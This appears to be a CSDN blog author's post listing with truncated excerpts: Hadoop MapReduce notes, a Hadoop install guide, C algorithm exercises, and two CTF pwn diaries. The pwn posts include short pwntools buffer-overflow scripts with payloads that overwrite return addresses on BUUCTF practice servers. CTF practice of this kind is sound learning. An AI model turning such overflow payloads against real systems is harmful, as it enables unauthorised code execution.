![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
笔记
文章平均质量分 61
m0_49766582
这个作者很懒,什么都没留下…
展开
-
knn两个
先考虑训练集很大,测试集很小的情况将测试集设置为全局文件,由于测试集很小,所以用hdfs的方法,在每一个map节点都会计算出它与每一个测试集的距离,输出:Key=测试集ID,Value=标签,距离然后在reduce中对距离进行排序,选取最小的前3个,把他们的标签放入List集合中,利用set集合去重的作用,将标签放入hashset(set集合的一种)中,再对与list集合中的标签进行比较(两个for循环),相等则计数+1,最终得到频率最高的标签即为该测试数据标签。输出key=测试数据ID,value=预原创 2022-01-21 19:00:40 · 1579 阅读 · 0 评论 -
专利引用关系数据集分析
专利引用关系数据集分析这次实验的两个题目,一个可以由词频统计代码改编,一个由倒排索引改编,改编的重点是将每一排的两个输入分开。输出专利被引用次数统计结果:根据题目要求需要输出被引用的专利和它的次数,在wordcount的基础上使用.split(",")方法,可以将一排输入的专利和被引用的专利以‘,’为间隔分开。存入字符串strs中。strs[0]为专利,strs[1]为被引用的专利。package wordcount;//导入必要的packageimport java...原创 2022-01-21 18:59:55 · 638 阅读 · 0 评论 -
专利去重重
package wordcount;//导入必要的packageimport java.io.IOException; //报错类import java.util.HashSet;import java.util.Iterator;//迭代器,与string和next有关import java.util.Set;import java.util.StringTokenizer; //StringTokenizer类,用于将空白字符作为分割符的类import org.apache原创 2022-01-21 18:59:15 · 107 阅读 · 0 评论 -
过滤停用词
过滤停用词过滤停用词中的重点是设置全局变量,设置全局变量有两种方法,1.hdfs读取,将文件设置在所有节点都能访问的地方,适合文件较大类型 2.利用分布式缓存的方式,运行的时候会把文件复制在每个节点中,适合文件较小的类型//利用分布式缓存方式设置全局变量package wordcount;import java.io.BufferedReader;import java.io.FileReader;import java.io.IOEx...原创 2022-01-21 18:57:35 · 463 阅读 · 0 评论 -
从wordcount词频统计代码到倒排索引的改编
从wordcount词频统计代码到倒排索引的改编分析word count代码Map中输出了单词和intwriteable类的对象one,而倒排索引,需要输出单词和文件名@偏移,偏移是key中含有的,使用.tostring方法就可以将它变成字符串与文件名和@连接。要输出文件名,需要导入Fliesplit类,将输入的文件分开,并通过.getname()方法获得文件名。Reduce中,wordcount输入是单词和intwriteable类的one,输出是单词和sum后的数字。而倒排索引输入是单词和Text原创 2022-01-21 18:56:36 · 120 阅读 · 0 评论 -
Hadoop实现词频统计(按照词频降序排列以及相同词频的单词按照字母序排列)
Hadoop实现词频统计(按照词频降序排列以及相同词频的单词按照字母序排列)分为两步词频统计和排序。第一个map reduce与过滤停用词的代码相同;第二个map reduce中的map将键值对内容交换,map到reduce的shufle中会自动进行key值升序排序,这时需要重写排序为降序。Reduce中需要将相同词频的单词按照字母进行升序排列,.sort()方法默认时升序排列的。重点:1.两个map reduce时需要将加入控制器2.重写sort类,在shuffle中的排序public stat原创 2022-01-21 18:54:46 · 3788 阅读 · 0 评论 -
Ubuntu16.04下Hadoop的本地安装与配置
Ubuntu16.04下Hadoop的本地安装与配置一、系统环境os : Ubuntu 16.04 LTS 64bitjdk : 1.8.0_161hadoop : 3.3.1二、安装步骤1、安装并配置ssh1.1 安装ssh输入命令: $ sudo apt-get install openssh-server ,安装完成后使用命令 $ ssh localhost 登录本机。1.2 配置ssh无密码登录首先使用命令 $ exit 退出上一步的ssh,然后使用ssh-keyge...原创 2022-01-21 18:52:56 · 2888 阅读 · 0 评论 -
第二天
今天也做了两道题第一题ciscn_2019_n_1 1点进去就可以看见11.28125在内存中存储的值。涉及到浮点数在内存中如何存储的问题:阶码https://blog.51cto.com/u_10984944/24758981 from pwn import *23 p=remote(‘node3.buuoj.cn’,29879)45 payload=b"A"*44+p64(0x41348000)6 p.sendline(payload)78 p.interactive()第原创 2021-04-27 17:29:43 · 74 阅读 · 0 评论 -
第一天
做了两道水题,我就是个废物第一题 buu rip1这里很神奇,可以通过代码看出s是15个字节的但是通过gdb调试rbp到rsp之间有16字节,实际上仔细看第一行最后一个数字是d0不是41(A)所以要构造15+8=23字节的垃圾数据payload=b"A"*23+p64(0x401016)+p64(0x401186)第二题 warmup题1 from pwn import *2 context.log_level = ‘debug’ #显示调试的信息3 p = remote(“原创 2021-04-25 22:18:46 · 97 阅读 · 0 评论 -
最少硬币找钱问题(动态规划)
#include <stdio.h>#include <stdlib.h>#define inf 0x3f3f3f3fint m[20][2000],p[200],w[20],s[20][2000];int max(int i,int j){if(i>j) return i;return j;}int min(int i,int j){if(i<j) return i;return j;}void knap(int M,int n){int原创 2021-01-18 14:58:44 · 663 阅读 · 0 评论 -
矩阵连乘
#include <stdio.h>#include <stdlib.h>//int m[200][200],s[200][200],p[200];//void MATRIXCHAIN(int n)可以采用全局变量,就不用传参,简单//void MATRIXCHAIN(int *p,int n,int **m,int **s)//二维数组不能这样赋值,因为不知道列数,所以确定不了指的范围void MATRIXCHAIN(int *p,int n,int m[][20],原创 2021-01-18 14:57:35 · 52 阅读 · 0 评论 -
0-1背包问题回溯法+上界函数
#include <stdio.h>#include <stdlib.h>int cp,cw,bestp,a[20]={0},M,w[20],p[20],n;int check(int k){ float up=(float)cp;int uw=cw; if (cw<a[k]*w[k]) return 0; else {while(uw>0&&(k<=n))//计算上界函数 {原创 2021-01-18 14:56:16 · 1050 阅读 · 0 评论 -
0-1背包问题动态规划
#include <stdio.h>#include <stdlib.h>int m[20][20],p[20],w[20];int max(int i,int j){ if(i>j) return i; return j;}int min(int i,int j){ if(i<j) return i; return j;}void knap(int M,int n){ int jmax,i,j; jma原创 2021-01-18 14:53:27 · 74 阅读 · 0 评论 -
多项式合并
#include <stdio.h>#include <stdlib.h>typedef struct pnode{ int coef; int exp; struct pnode *next;} polynode;//带有头结点的尾插法建表 polynode* GREASTLIST(){ int b,n,a; polynode* head, * r, * s; head =malloc(sizeof(polynode)原创 2020-12-07 19:49:31 · 572 阅读 · 0 评论 -
单源最短路径 迪杰特斯拉算法
#include <stdio.h>#include <stdlib.h>#define inf 0x3f3ftypedef struct//图的存储结构——邻接矩阵{ int arcs[20][20];}graph;CREATEGRAPH(graph *ga,int n)//建图{ int i,j,k; int w,e; scanf("%d",&e);//输入边数 for(i=0;i<n;i++) for(原创 2020-11-28 13:30:08 · 222 阅读 · 0 评论 -
作业调度问题之贪心算法
#include <stdio.h>#include <stdlib.h>struct node{ int num; int value; int time;};struct node a[20],b[20];int main(){ int n,i,j,min; struct node t; scanf("%d",&n); for(i=1;i<=n;i++) { a[i].nu原创 2020-11-28 13:22:45 · 1951 阅读 · 1 评论 -
十进制大数乘法,加法,减法
#include <stdio.h>#include <math.h>void print(int * m);void yiwei(int * m1, int * m2, int n); /* m1左移n位得到m2 */void sub(int *A, int * B, int * C);void add(int *A,int *B, int *C);void mult(int *x, int *y, int n, int *z);int max(int *A,原创 2020-11-28 13:15:17 · 724 阅读 · 0 评论 -
栈 队列 之小猫钓鱼
基本知识```c#include <stdio.h>#include <stdlib.h>typedef struct{ int data[20]; int top;}stqstack;void PUSH(stqstack *s,int x)//返回的是指针函数也是指针类型的{ s->top++;s->data[s->top]=x;}/*stqstack *PUSH(stqstack *s,int x)//返回的是指针函原创 2020-10-13 20:11:40 · 135 阅读 · 0 评论 -
dfs+剪枝
下图中,每个方块代表 1…13中的某一个数字,但不重复。例如:1×2+9×7=13×510×8−12×3=11×4只要有任意一个方块代表的数字不同,就算两种不同的方案。请你计算,一共有多少种不同的方案。#include <stdio.h>int a[10];int f[14];int c=0;void dfs(int step){ if(step==5){ int result1 = a[0]*a[1]+a[2]*a[3]; int原创 2020-09-29 23:06:39 · 51 阅读 · 0 评论 -
方程组的解数
蒜头君在求解一个 nnn 元的高次方程:k1x1p1+k2x2p2+…+knxnpn=0\displaystyle k_1x_1{p_1}+k_2x_2{p_2}+\ldots+k_nx_n^{p_n}=0k1x1p1+k2x2p2+…+knxnpn=0其中:x1,x2,…,xnx_1,x_2,\ldots,x_nx1,x2,…,xn 是未知数,k1,k2,…,knk_1,k_2,\ldots,k_nk1,k2,…,kn 是系数,p1,p2,…,pnp_1,p_2,\ldo原创 2020-09-29 20:19:23 · 140 阅读 · 0 评论 -
快速幂取模问题
#include <stdio.h>#include <stdlib.h>int pw(int x, int y, int p) { if (!y) { return 1; } int res = pw(x*x%p,y/2,p); if (y & 1) { res = res * x % p; } return res;}int main() { int x, y, p;原创 2020-09-28 19:58:00 · 66 阅读 · 0 评论